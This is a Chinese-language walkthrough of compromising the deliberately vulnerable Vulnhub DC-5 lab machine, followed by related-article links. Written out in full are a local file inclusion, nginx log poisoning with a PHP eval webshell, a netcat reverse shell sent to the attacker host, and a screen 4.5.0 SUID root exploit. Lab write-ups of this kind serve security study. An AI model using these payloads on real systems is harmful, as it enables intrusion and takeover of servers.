Vulnhub靶机实战——DC-5
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip
环境:VMware 15虚拟机软件
DC-5靶机IP地址:192.168.220.139
Kali的IP地址:192.168.220.145
DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145
ip addr
使用nmap工具扫描192.168.220.0/24网段发现存活主机,扫到DC-5靶机IP为:192.168.220.139
nmap -T4 -sP 192.168.220.0/24 -oN nmap220.sP
使用nmap工具对DC-5靶机扫描开放的端口,开放端口有80(http)、111、41363
nmap -A -T4 192.168.220.139 -p- -oN nmap139.A
使用浏览器打开靶机网址,页面如下
http://192.168.220.139/
打开Contact页面,发现是一个留言板块,在留言板块输入内容并提交
http://192.168.220.139/contact.php
页面跳转到Thankyou.php,并且在URL地址栏可以看到参数,GET方式传参
http://192.168.220.139/thankyou.php?firstname=1234&lastname=1234&country=canada&subject=12121
当刷新页面时发现Copyright © 2017 一直在变化,猜测页面存在文件包含
使用BurpSuite抓包,爆破后台页面,发现存在index.php,solutions.php,about-us.php,faq.php,contact.php,thankyou.php,footer.php七个页面
在浏览器打开footer.php页面,确认文件包含页面是footer.php
http://192.168.220.139/footer.php
使用BurpSuite爆破文件包含的变量名,及后台passwd文件存在位置
变量名:file,passwd文件位置:/etc/passwd
http://192.168.220.139/thankyou.php?page=footer.php
http://192.168.220.139/thankyou.php?file=footer.php
地址栏输入,打开passwd文件
http://192.168.220.139/thankyou.php?file=/etc/passwd
使用BurpSuite抓包爆破靶机日志文件的位置,爆破成功
/var/log/nginx/error.log/var/log/nginx/access.log
使用BurpSuite修改数据包数据,向日志文件中写入一句话木马,打开日志文件可以看到成功写入
http://192.168.220.139/thankyou.php?file=/var/log/nginx/access.loghttp://192.168.220.139/thankyou.php?file=/var/log/nginx/error.logGET /hello-world! <?php @eval($_REQUEST[666])?> HTTP/1.1
使用中国蚁剑连接,成功获取后台文件及虚拟终端
在服务器/tmp目录下新建一个shell.php文件,写入一句话木马并重新连接
文件shell.php内容如下:
1234567890
<?php
@eval($_REQUEST[666])
?>
打开shell.php文件,并使用蚁剑连接到虚拟终端
http://192.168.220.139/thankyou.php?file=/tmp/shell.php
使用蚁剑虚拟终端反弹shell到kali
nc -e /bin/bash 192.168.220.142 4567
在kali监听4567端口接收shell
nc -lvvp 4567
切换shell外壳
python -c 'import pty;pty.spawn("/bin/bash")'
使用find命令,查找具有suid权限的命令,发现screen-4.5.0
find / -perm /4000 2>dev/null
查找可用于screen 4.5.0的漏洞脚本文件
searchsploit screen 4.5.0
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.shcp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.txt
将41154.sh中上面一部分c语言代码另存为libhax.c
编译libhax.c文件
gcc -fPIC -shared -ldl -o libhax.so libhax.c
将41154.sh中下面一部分c语言代码另存为rootshell.c
编译rootshell.c文件
gcc -o rootshell rootshell.c
将41154.sh中剩下部分代码另存为dc5.sh脚本文件
并在保存dc5.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错
使用蚁剑将libhax.so 、rootshell 、dc5.sh三个文件上传到服务器的/tmp目录下
为dc5.sh增加可执行权限,执行dc5.sh文件,成功获取到root权限
www-data@dc-5:/tmp$ chmod +x dc5.shwww-data@dc-5:/tmp$ ./dc5.sh
获取root权限后,进入root目录下,成功获取thisistheflag.txt文件
Vulnhub靶机实战——DC-5相关推荐
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- Vulnhub靶机实战——DC-8
靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...
- Vulnhub靶机实战——DC-3
靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...
- Vulnhub靶机实战——Matrix2
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Ma ...
- 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...
- 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...
- Vulnhub靶机实战——Matrix3
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...
- DC-5 vulnhub靶机实战
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...
- Vulnhub靶机实战-Forensics
声明 好好学习,天天向上 搭建 vmware打开,网络和攻击机一样,桥接模式 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.152 -p 1 ...
最新文章
- ipv4 帧中继配置(GNS3)
- iOS开发之第三方框架Masonry
- Zabbix3.0 安装Graphtree
- MySQL性能优化(二)
- 网络协议栈深入分析(一)--与sk_buff有关的几个重要的数据结构
- tcp/ip通信第5期之客户机端程序
- 多片段时序数据建模预测实践
- 各代iphone尺寸_历代iPhone机身厚度对比: 6代最薄, iPhone X 难进前五
- html想实现文字环绕图片,HTML/CSS实现文字环绕图片布局
- 知识图谱从入门到应用——知识图谱的知识表示:向量表示方法
- Solidity ERC777标准
- 复合函数的极限与连续
- 怎么转换书法字体?教你快速转换毛笔字体
- sparc-linux-gcc math.h 调用,无法使用叮进行交叉编译为SPARC
- 冷色调的亮度越高--越偏暖,暖色调的亮度越高--越偏冷
- WebSocket 协议以及 Socket 接口
- 安卓手机测评_2018最全安卓模拟器跑分测评
- 2022年第一个技能:视频剪辑学习笔记
- 2019年,给你在成都必混IT界的几大理由!
- iOS使用dpkg删除包提示不存在
热门文章
- css基本语法结构(看张鹏老师的视频课程后所总结的)
- java中move用法_Java IFile.move方法代碼示例
- autocad2004的那些基本设计功能 满足基本用户需求
- nginx的配置与安装
- 人性弱点-如何赢得朋友和影响别人
- 最简单日柱推算法_如何学习吉他?史前从未有过的最简单的讲故事学习法
- CancelToken——取消请求
- 什么是轻量应用服务器?与阿里云ecs和虚拟主机有什么区别?阿里云优惠券领取...
- 看后视镜扣钱?AI 摄像头监控下的货车司机
- minecraft刷怪笼java_Minecraft Java版 21w03a 发布